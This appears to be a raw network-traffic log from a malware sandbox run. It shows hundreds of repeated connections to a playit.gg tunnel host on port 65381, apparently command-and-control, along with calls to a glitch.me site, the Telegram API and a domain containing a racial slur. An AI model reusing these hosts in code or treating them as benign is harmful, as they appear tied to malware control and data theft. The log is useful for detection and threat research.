US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 104.21.66.212:443 niggafart.com udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 13.107.6.158:80 edge-http.microsoft.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 95.100.153.185:443 www.bing.com udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 104.21.66.212:443 niggafart.com udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 13.107.6.158:80 edge-http.microsoft.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 104.21.66.212:443 niggafart.com udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 95.100.153.138:443 www.bing.com udp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 104.21.66.212:443 niggafart.com udp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50150 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50224 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50250 tcp
N/A 127.0.0.1:50264 tcp
N/A 127.0.0.1:50278 tcp
N/A 127.0.0.1:50290 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 2.18.190.173:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
N/A 127.0.0.1:50305 tcp
N/A 127.0.0.1:50322 tcp
N/A 127.0.0.1:50335 tcp
N/A 127.0.0.1:50347 tcp
N/A 127.0.0.1:50369 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50373 tcp
N/A 127.0.0.1:50400 tcp
N/A 127.0.0.1:50417 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50449 tcp
N/A 127.0.0.1:50467 tcp
N/A 127.0.0.1:50485 tcp
N/A 127.0.0.1:50510 tcp
N/A 127.0.0.1:50574 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50596 tcp
N/A 127.0.0.1:50615 tcp
N/A 127.0.0.1:50635 tcp
N/A 127.0.0.1:50651 tcp
N/A 127.0.0.1:50667 tcp
N/A 127.0.0.1:50685 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50698 tcp
N/A 127.0.0.1:50716 tcp
N/A 127.0.0.1:50728 tcp
N/A 127.0.0.1:50748 tcp
N/A 127.0.0.1:50764 tcp
N/A 127.0.0.1:50782 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50817 tcp
N/A 127.0.0.1:50843 tcp
N/A 127.0.0.1:50865 tcp
N/A 127.0.0.1:50879 tcp
N/A 127.0.0.1:50908 tcp
N/A 127.0.0.1:50915 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50950 tcp
N/A 127.0.0.1:50971 tcp
N/A 127.0.0.1:50974 tcp
N/A 127.0.0.1:50987 tcp
N/A 127.0.0.1:51024 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51033 tcp
N/A 127.0.0.1:51058 tcp
N/A 127.0.0.1:51067 tcp
N/A 127.0.0.1:51106 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51118 tcp
N/A 127.0.0.1:51141 tcp
N/A 127.0.0.1:51157 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51194 tcp
N/A 127.0.0.1:51267 tcp
N/A 127.0.0.1:51282 tcp
N/A 127.0.0.1:51377 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51392 tcp
N/A 127.0.0.1:51445 tcp
N/A 127.0.0.1:51462 tcp
N/A 127.0.0.1:51495 tcp
N/A 127.0.0.1:51513 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51528 tcp
N/A 127.0.0.1:51553 tcp
N/A 127.0.0.1:51556 tcp
N/A 127.0.0.1:51580 tcp
N/A 127.0.0.1:51600 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51617 tcp
N/A 127.0.0.1:51633 tcp
N/A 127.0.0.1:51648 tcp
N/A 127.0.0.1:51667 tcp
N/A 127.0.0.1:51683 tcp
N/A 127.0.0.1:51703 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51715 tcp
N/A 127.0.0.1:51734 tcp
N/A 127.0.0.1:51749 tcp
N/A 127.0.0.1:51763 tcp
N/A 127.0.0.1:51787 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51809 tcp
N/A 127.0.0.1:51825 tcp
N/A 127.0.0.1:51848 tcp
N/A 127.0.0.1:51851 tcp
N/A 127.0.0.1:51881 tcp
N/A 127.0.0.1:51884 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51914 tcp
N/A 127.0.0.1:51929 tcp
N/A 127.0.0.1:51961 tcp
N/A 127.0.0.1:51977 tcp
N/A 127.0.0.1:52004 tcp
N/A 127.0.0.1:52007 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:52035 tcp
N/A 127.0.0.1:52045 tcp
N/A 127.0.0.1:52073 tcp
N/A 127.0.0.1:52089 tcp
N/A 127.0.0.1:52105 tcp
N/A 127.0.0.1:52128 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:52151 tcp
N/A 127.0.0.1:52170 tcp
N/A 127.0.0.1:52181 tcp
N/A 127.0.0.1:52195 tcp
N/A 127.0.0.1:52226 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:52243 tcp
N/A 127.0.0.1:52254 tcp
N/A 127.0.0.1:52268 tcp
N/A 127.0.0.1:52292 tcp
N/A 127.0.0.1:52321 tcp
N/A 127.0.0.1:52347 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:52360 tcp
N/A 127.0.0.1:52393 tcp
N/A 127.0.0.1:52409 tcp
N/A 127.0.0.1:52419 tcp
N/A 127.0.0.1:52449 tcp
N/A 127.0.0.1:52468 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:52484 tcp
N/A 127.0.0.1:52499 tcp
N/A 127.0.0.1:52520 tcp
N/A 127.0.0.1:52545 tcp
N/A 127.0.0.1:52551 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:52583 tcp
N/A 127.0.0.1:52602 tcp
N/A 127.0.0.1:52627 tcp
N/A 127.0.0.1:52651 tcp
N/A 127.0.0.1:52654 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:52680 tcp
N/A 127.0.0.1:52695 tcp
N/A 127.0.0.1:52710 tcp
N/A 127.0.0.1:52742 tcp
N/A 127.0.0.1:52757 tcp
N/A 127.0.0.1:52775 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
